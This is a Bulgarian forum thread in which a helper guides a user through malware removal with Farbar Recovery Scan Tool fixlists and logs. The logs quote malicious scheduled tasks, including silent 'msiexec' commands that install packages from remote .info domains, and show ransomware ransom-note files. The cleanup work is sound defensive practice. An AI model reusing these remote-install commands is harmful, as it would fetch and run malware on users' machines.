HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{984AFA40-4BEC-457F-AEDE-FE3404A646FA} => removed successfully.
HKLM\Software\Classes\CLSID\{984AFA40-4BEC-457F-AEDE-FE3404A646FA} => removed successfully.
"qamplvkj" => service was unlocked. <==== ATTENTION => Error: No automatic fix found for this entry.
 

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Не се изпълнил целия фикс...и имам съмнения от къде ....Изчакай малко да направя една корекция ...!

 

Да видим сега дали ще се изпълни ..отново в Safe Mode (with Networking) :


icon13.gif Изтеглете прикачения файл fixlist.txt  и го запазете там, където сте свалили FRST.exe
Стартирайте отново FRST.exe и натиснете бутона Fix веднъж и изчакайте.

Press%20the%20FIX%20button_zpsdd5zi3mt.p


Ще се създаде нов лог файла FixLog.txt. Прикачете съдържанието му в следващия си коментар.
 
ЗАБЕЛЕЖКА: Този скрипт е написан специално за този потребител,и за тази конкретна машина. Изпълнението на фикса, на друг компютър може да доведе до увреждане на  операционната ви система

 

pfNZP4A.png  Дневници
 
В следващия си отговор, моля да включите следните дневници:

  • FixLog.txt

 

  • Харесва ми 1

Сподели този отговор


Линк към този отговор
Сподели в други сайтове

Fix result of Farbar Recovery Scan Tool (x86) Version: 01-01-2019
Ran by ВЕС (04-01-2019 18:18:30) Run:2
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Boot Mode: Safe Mode (with Networking)

==============================================

fixlist content:
*****************
start
CreateRestorePoint:
EmptyTemp:
CloseProcesses:

CMD: sc stop "qamplvkj"
CMD: sc delete "qamplvkj"

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [DHY0GM3ATCSFE7M] => "C:\Program Files\x0h1djdcnoe\3OQCH.exe"
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\Run: [Web Companion] => C:\Program Files\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize
HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\MountPoints2: {41be252d-0f82-11e9-a624-002713343a56} - F:\Lenovo_Suite.exe
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-3512987231-521144983-709920193-1000 -> {BDF61FAE-9D19-40F0-8F34-688DEB334CA9} URL = hxxp://securedsearch.lavasoft.com/results.php?pr=vmn&id=webcompa&ent=ch_WCYID10477_754_190103&q={searchTerms}
BHO: YoutubeAdBlock -> {984AFA40-4BEC-457F-AEDE-FE3404A646FA} -> C:\Program Files\VKkhWVSisIE\kwTiXoR.dll => No File 
S2 qamplvkj; C:\Windows\system32\qamplvkj\dfaricjc.exe [0 ] () <==== ATTENTION (zero byte File/Folder)
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\teiqv2gvtfm
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\imgn0qmwmwh
2019-01-03 19:10 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\acysy1vaoki
2019-01-03 19:08 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\3zxuksmazmq
2019-01-03 19:04 - 2019-01-03 19:04 - 000000000 ____D C:\Windows\system32\qamplvkj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\vi5lm2mflim
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\sq0zlve2tqj
2019-01-03 19:02 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\qc1oa2vrskn
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\423viiu5lfu
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:57 - 2019-01-03 18:57 - 000000000 ____H C:\d85105b2d85102533b.lock
2019-01-03 18:56 - 2019-01-03 18:56 - 000000000 ____D C:\ProgramData\HCRGWPOIZH4OHCKX91M2
C:\Windows\system32\qamplvkj\dfaricjc.exe
Task: {28388CE9-2CA7-49CC-9564-0F424E14BEED} - System32\Tasks\DvwLFWwXutwLxJgmB2 => rundll32 "C:\Program Files\ooxzIAzTqruiVIszQdR\yydPZjO.dll",#1
Task: {56D6A7AF-393C-40E2-9FC4-2A3636BD7188} - System32\Tasks\{EF961BFA-57B7-56F3-7C41-CBDA384B27B1} => "msiexec" -package hxxps://refreshnerer711.info/wVM4raQAo.n1e /q
Task: {7AF01070-CEDB-4440-A34C-665C65F672C1} - System32\Tasks\iYMvCriySoqaGgPjbmR2 => rundll32 "C:\Program Files\qUgzYKxVLnesC\lnFhOtc.dll",#1
Task: {8E82EE52-6E07-47A4-94E6-6615304E8C41} - System32\Tasks\{9691CC12-2E74-1BC2-86C6-CA40BD9675B3} => "msiexec" /q /i hxxps://refreshnerer711rb.info/F01BsF0RBXQ.CrC
Task: {97F429C1-49D9-4EE5-82B4-4FC29549D18B} - System32\Tasks\UXshqEpiPQcXH2 => C:\Windows\system32\wscript.exe "C:\ProgramData\BuHcEEPgNwocAWVB\QkkdFBc.wsf"
Task: {DB69F2CB-FE06-4A26-872B-C008C9CFD1BC} - System32\Tasks\mMzvDpxKxjJVUr => rundll32 "C:\Program Files\hUmbquBpttZU2\mNvKUiXnBbMki.dll",#1
AlternateDataStreams: C:\Windows\system32\config\systemprofile:.repos [6509722]
IE trusted site: HKU\S-1-5-21-3512987231-521144983-709920193-1000\...\webcompanion.com -> hxxp://webcompanion.com
reboot:
end

*****************

Error: Restore point can only be created in normal mode.
Processes closed successfully.

========= sc stop "qamplvkj" =========

[SC] ControlService FAILED 1062:

The service has not been started.


========= End of CMD: =========


========= sc delete "qamplvkj" =========

[SC] DeleteService SUCCESS

========= End of CMD: =========

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => not found
"HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Run\\DHY0GM3ATCSFE7M" => not found
"HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Web Companion" => not found
HKU\S-1-5-21-3512987231-521144983-709920193-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{41be252d-0f82-11e9-a624-002713343a56} => not found
HKLM\Software\Classes\CLSID\{41be252d-0f82-11e9-a624-002713343a56} => not found
HKLM\SOFTWARE\Policies\Google => not found
HKU\S-1-5-21-3512987231-521144983-709920193-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} => not found
HKLM\Software\Classes\CLSID\{BDF61FAE-9D19-40F0-8F34-688DEB334CA9} => not found
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{984AFA40-4BEC-457F-AEDE-FE3404A646FA} => not found
HKLM\Software\Classes\CLSID\{984AFA40-4BEC-457F-AEDE-FE3404A646FA} => not found
qamplvkj => service not found.
C:\Users\ВЕС\AppData\Roaming\teiqv2gvtfm => moved successfully
C:\Users\ВЕС\AppData\Roaming\imgn0qmwmwh => moved successfully
C:\Users\ВЕС\AppData\Roaming\acysy1vaoki => moved successfully
C:\Users\ВЕС\AppData\Roaming\3zxuksmazmq => moved successfully
C:\Windows\system32\qamplvkj => moved successfully
C:\Users\ВЕС\AppData\Roaming\vi5lm2mflim => moved successfully
C:\Users\ВЕС\AppData\Roaming\sq0zlve2tqj => moved successfully
C:\Users\ВЕС\AppData\Roaming\qc1oa2vrskn => moved successfully
"C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK" => not found
C:\Users\ВЕС\AppData\Roaming\423viiu5lfu => moved successfully
"C:\Users\NYBMYXMIG-DECRYPT.txt" => not found
C:\NYBMYXMIG-DECRYPT.txt => moved successfully
C:\d85105b2d85102533b.lock => moved successfully
C:\ProgramData\HCRGWPOIZH4OHCKX91M2 => moved successfully
"C:\Windows\system32\qamplvkj\dfaricjc.exe" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{28388CE9-2CA7-49CC-9564-0F424E14BEED}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28388CE9-2CA7-49CC-9564-0F424E14BEED}" => removed successfully.
C:\Windows\System32\Tasks\DvwLFWwXutwLxJgmB2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\DvwLFWwXutwLxJgmB2" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{56D6A7AF-393C-40E2-9FC4-2A3636BD7188}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{56D6A7AF-393C-40E2-9FC4-2A3636BD7188}" => removed successfully.
C:\Windows\System32\Tasks\{EF961BFA-57B7-56F3-7C41-CBDA384B27B1} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{EF961BFA-57B7-56F3-7C41-CBDA384B27B1}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7AF01070-CEDB-4440-A34C-665C65F672C1}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7AF01070-CEDB-4440-A34C-665C65F672C1}" => removed successfully.
C:\Windows\System32\Tasks\iYMvCriySoqaGgPjbmR2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iYMvCriySoqaGgPjbmR2" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8E82EE52-6E07-47A4-94E6-6615304E8C41}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8E82EE52-6E07-47A4-94E6-6615304E8C41}" => removed successfully.
C:\Windows\System32\Tasks\{9691CC12-2E74-1BC2-86C6-CA40BD9675B3} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9691CC12-2E74-1BC2-86C6-CA40BD9675B3}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{97F429C1-49D9-4EE5-82B4-4FC29549D18B}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97F429C1-49D9-4EE5-82B4-4FC29549D18B}" => removed successfully.
C:\Windows\System32\Tasks\UXshqEpiPQcXH2 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UXshqEpiPQcXH2" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DB69F2CB-FE06-4A26-872B-C008C9CFD1BC}" => removed successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB69F2CB-FE06-4A26-872B-C008C9CFD1BC}" => removed successfully.
C:\Windows\System32\Tasks\mMzvDpxKxjJVUr => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\mMzvDpxKxjJVUr" => removed successfully.
C:\Windows\system32\config\systemprofile => ":.repos" ADS removed successfully.
HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com => removed successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 12395873 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 5029417 B
Edge => 0 B
Chrome => 218449083 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66228 B
LocalService => 66228 B
NetworkService => 66228 B
ВЕС => 71105094 B

RecycleBin => 923852 B
EmptyTemp: => 293.8 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 18:18:47 ====

В нормален режим 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 01-01-2019
Ran by ВЕС (administrator) on WIN-SKFJ6HLGST2 (04-01-2019 18:26:43)
Running from C:\Users\ВЕС\Downloads
Loaded Profiles: ВЕС (Available Profiles: ВЕС)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\...\Drivers32: [MSVideo8] => C:\Windows\system32\VfWWDM32.dll [56832 2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [>{60B49E34-C7CC-11D0-8953-00A0C90347FF}] -> C:\Windows\System32\iedkcs32.dll [2010-11-20] (Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2019-01-03] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{840DEA2A-8553-4D25-A5FB-7DB86C5BFBE5}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{EE11610E-0BCC-42A7-A0AC-89B4A3B92BF1}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKU\S-1-5-21-3512987231-521144983-709920193-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-xl/?ocid=iehp

FireFox:
========
FF ProfilePath: C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default [2019-01-03]
FF user.js: detected! => C:\Users\ВЕС\AppData\Roaming\K-Meleon\oytl87x0.default\user.js [2006-04-06]
FF Extension: (NewsFox) - C:\Users\ВЕС\Downloads\k-meleon\browser\extensions\{899DF1F8-2F43-4394-8315-37F6744E6319}.xpi [2016-01-04] [Legacy] [not signed]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.23\npGoogleUpdate3.dll [No File]

Chrome: 
=======
CHR HomePage: Default -> hxxp://google.bg/
CHR Profile: C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default [2019-01-04]
CHR Extension: (Lightshot (скрииншот инструмент)) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\mbniclmhobmnbdlbpiphghaielnnpgdp [2019-01-03]
CHR Extension: (Плащания в уеб магазина на Chrome) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-01-03]
CHR Extension: (Chrome Media Router) - C:\Users\ВЕС\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-03]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 GoogleChromeElevationService; C:\Program Files\Google\Chrome\Application\71.0.3578.98\elevation_service.exe [375776 2018-12-12] (Google Inc.)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [5073376 2018-09-19] (Malwarebytes)
S2 gupdate; "C:\Program Files\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files\Google\Update\GoogleUpdate.exe" /medsvc [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae.sys [129248 2018-12-04] (Malwarebytes)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [172280 2019-01-04] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [106144 2019-01-04] (Malwarebytes)
R3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [63760 2019-01-04] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [230120 2019-01-04] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [83648 2019-01-04] (Malwarebytes)
U3 TrueSight; \??\C:\Windows\System32\drivers\truesight.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 18:20 - 2019-01-04 18:23 - 000083648 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2019-01-04 18:20 - 2019-01-04 18:20 - 000230120 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2019-01-04 18:20 - 2019-01-04 18:20 - 000106144 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2019-01-04 18:20 - 2019-01-04 18:20 - 000063760 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2019-01-04 18:18 - 2019-01-04 18:18 - 000010173 _____ C:\Users\ВЕС\Downloads\Fixlog.txt
2019-01-04 16:30 - 2019-01-04 16:30 - 000005319 _____ C:\Users\ВЕС\Documents\Fixlog.txt
2019-01-04 16:30 - 2019-01-04 16:30 - 000003620 _____ C:\Users\ВЕС\Documents\fixlist.txt
2019-01-04 03:15 - 2019-01-04 03:15 - 000001345 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
2019-01-04 03:15 - 2019-01-04 03:15 - 000001326 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
2019-01-04 03:14 - 2019-01-04 03:14 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdFs_01_09_00.Wdf
2019-01-04 03:10 - 2019-01-03 18:31 - 000000000 ____D C:\Windows\Panther
2019-01-04 03:03 - 2019-01-04 03:03 - 000000000 ____D C:\Windows.old
2019-01-03 20:44 - 2019-01-03 20:44 - 000017953 _____ C:\Users\ВЕС\Downloads\Addition.txt
2019-01-03 20:43 - 2019-01-04 18:27 - 000005358 _____ C:\Users\ВЕС\Downloads\FRST.txt
2019-01-03 20:43 - 2019-01-04 18:26 - 000000000 ____D C:\FRST
2019-01-03 20:43 - 2019-01-03 20:43 - 001783808 _____ (Farbar) C:\Users\ВЕС\Downloads\FRST.exe
2019-01-03 20:03 - 2019-01-03 20:03 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbam
2019-01-03 20:02 - 2019-01-04 16:29 - 000172280 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2019-01-03 20:02 - 2019-01-03 20:02 - 000002020 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Users\ВЕС\AppData\Local\mbamtray
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\ProgramData\Malwarebytes
2019-01-03 20:02 - 2019-01-03 20:02 - 000000000 ____D C:\Program Files\Malwarebytes
2019-01-03 20:02 - 2018-12-04 08:09 - 000129248 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae.sys
2019-01-03 20:00 - 2019-01-03 20:01 - 081227760 _____ (Malwarebytes ) C:\Users\ВЕС\Downloads\mb3-setup-consumer-3.6.1.2711-1.0.508-1.0.8211.exe
2019-01-03 19:40 - 2019-01-03 20:03 - 000000000 ____D C:\ProgramData\RogueKiller
2019-01-03 19:40 - 2019-01-03 19:40 - 029162424 _____ (Adlice Software ) C:\Users\ВЕС\Downloads\RogueKiller_setup.exe
2019-01-03 19:40 - 2019-01-03 19:40 - 000001001 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2019-01-03 19:40 - 2019-01-03 19:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2019-01-03 19:40 - 2019-01-03 19:40 - 000000000 ____D C:\Program Files\RogueKiller
2019-01-03 19:34 - 2019-01-04 16:29 - 000383916 _____ C:\Windows\ntbtlog.txt
2019-01-03 19:30 - 2019-01-03 19:30 - 000000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:09 - 2019-01-03 19:09 - 000000009 _____ C:\Users\ВЕС\rstr1.ini
2019-01-03 19:07 - 2019-01-03 19:07 - 000000258 __RSH C:\Users\ВЕС\ntuser.pol
2019-01-03 19:02 - 2019-01-03 19:02 - 000000000 ____D C:\Users\ВЕС\AppData\LocalLow\yHNPHHIzKpsCK
2019-01-03 19:01 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Michael
2019-01-03 19:01 - 2019-01-03 19:19 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ShopMore
2019-01-03 19:01 - 2019-01-03 19:07 - 000002964 __RSH C:\ProgramData\ntuser.pol
2019-01-03 19:01 - 2019-01-03 19:01 - 000493800 _____ (VideoDriver) C:\Windows\D04DE5140B2D.sys
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Python
2019-01-03 19:00 - 2019-01-03 20:05 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\ezc3lfxnx4j
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ C:\Users\ВЕС\AppData\Local\wbem.ini
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{AC10FE2E-1A46-0496-3E07-15883EE04CD9}
2019-01-03 19:00 - 2019-01-03 19:00 - 000000000 ____D C:\ProgramData\{59403C6F-D807-F1C6-7FC5-457D7F221C2C}
2019-01-03 18:57 - 2019-01-03 18:57 - 000008906 _____ C:\Users\NYBMYXMIG-DECRYPT.txt
2019-01-03 18:56 - 2015-08-03 08:53 - 000384000 _____ (SafeIP) C:\Windows\system32\SafeIPs.dll
2019-01-03 18:55 - 2019-01-03 20:05 - 000000000 ____D C:\Program Files\KMSPico 10.2.1 Final
2019-01-03 18:53 - 2018-12-10 23:04 - 000499424 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2019-01-03 18:48 - 2019-01-03 18:48 - 001259736 _____ (Plarium) C:\Users\ВЕС\Downloads\PlariumPlaySetup (1).exe
2019-01-03 18:46 - 2019-01-03 18:46 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Package Cache
2019-01-03 18:45 - 2019-01-03 19:03 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Mozilla
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\K-Meleon
2019-01-03 18:45 - 2019-01-03 18:45 - 000000000 ____D C:\Users\ВЕС\AppData\Local\K-Meleon
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Plarium
2019-01-03 18:44 - 2019-01-03 18:44 - 000000000 ____D C:\Users\ВЕС\AppData\Local\CEF
2019-01-03 18:39 - 2019-01-03 18:39 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Google
2019-01-03 18:38 - 2019-01-03 19:53 - 000002202 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-01-03 18:38 - 2019-01-03 19:53 - 000002161 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-01-03 18:37 - 2019-01-03 19:02 - 000000000 ____D C:\Program Files\Google
2019-01-03 18:37 - 2019-01-03 19:00 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Google
2019-01-03 18:37 - 2019-01-03 18:37 - 000057560 _____ C:\Users\ВЕС\AppData\Local\GDIPFONTCACHEV1.DAT
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Deployment
2019-01-03 18:37 - 2019-01-03 18:37 - 000000000 ____D C:\Users\ВЕС\AppData\Local\Apps\2.0
2019-01-03 18:36 - 2014-05-14 17:23 - 001973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2019-01-03 18:36 - 2014-05-14 17:23 - 000054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2019-01-03 18:36 - 2014-05-14 17:23 - 000045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2019-01-03 18:36 - 2014-05-14 17:17 - 002425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2019-01-03 18:36 - 2014-05-14 09:23 - 000179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2019-01-03 18:36 - 2014-05-14 09:17 - 000033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2019-01-03 18:33 - 2019-01-03 19:53 - 000001335 _____ C:\Users\ВЕС\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2019-01-03 18:33 - 2019-01-03 19:09 - 000000000 ____D C:\Users\ВЕС
2019-01-03 18:33 - 2019-01-03 18:33 - 000000020 ___SH C:\Users\ВЕС\ntuser.ini
2019-01-03 18:33 - 2019-01-03 18:33 - 000000000 ____D C:\Users\ВЕС\AppData\Local\VirtualStore
2019-01-03 18:33 - 2010-11-21 01:46 - 000000000 ____D C:\Users\ВЕС\AppData\Roaming\Media Center Programs
2019-01-03 16:27 - 2019-01-03 16:27 - 000000000 ____D C:\My Drivers
2018-12-30 08:50 - 2018-12-30 08:50 - 005183296 _____ (Marcin Szeniak ) C:\Users\ВЕС\Downloads\BCUninstaller_4.12.1_setup.exe
2018-12-29 13:35 - 2018-12-29 13:35 - 000000000 ____D C:\SWSetup

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-01-04 18:24 - 2010-11-20 22:01 - 000713888 _____ C:\Windows\system32\PerfStringBackup.INI
2019-01-04 18:24 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\inf
2019-01-04 18:19 - 2009-07-14 05:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-01-04 16:25 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-01-04 16:25 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-01-04 03:15 - 2009-07-14 05:52 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2019-01-04 03:15 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\sysprep
2019-01-04 03:12 - 2010-11-21 01:46 - 000000000 ____D C:\Windows\CSC
2019-01-04 03:10 - 2009-07-14 05:52 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2019-01-03 19:01 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\GroupPolicy
2019-01-03 18:57 - 2018-08-11 19:54 - 000000000 ____D C:\Intel
2019-01-03 18:57 - 2017-10-21 13:53 - 000000000 ____D C:\LFS
2019-01-03 18:57 - 2017-09-25 20:50 - 000000000 ___RD C:\BECKO-PC
2019-01-03 18:57 - 2017-04-14 15:10 - 000036892 ____H C:\iCS Source.suo.nybmyxmig
2019-01-03 18:33 - 2009-07-14 05:33 - 000266808 _____ C:\Windows\system32\FNTCACHE.DAT
2019-01-03 18:31 - 2009-07-14 03:37 - 000000000 __RHD C:\Users\Public\Libraries
2019-01-03 17:30 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\rescache
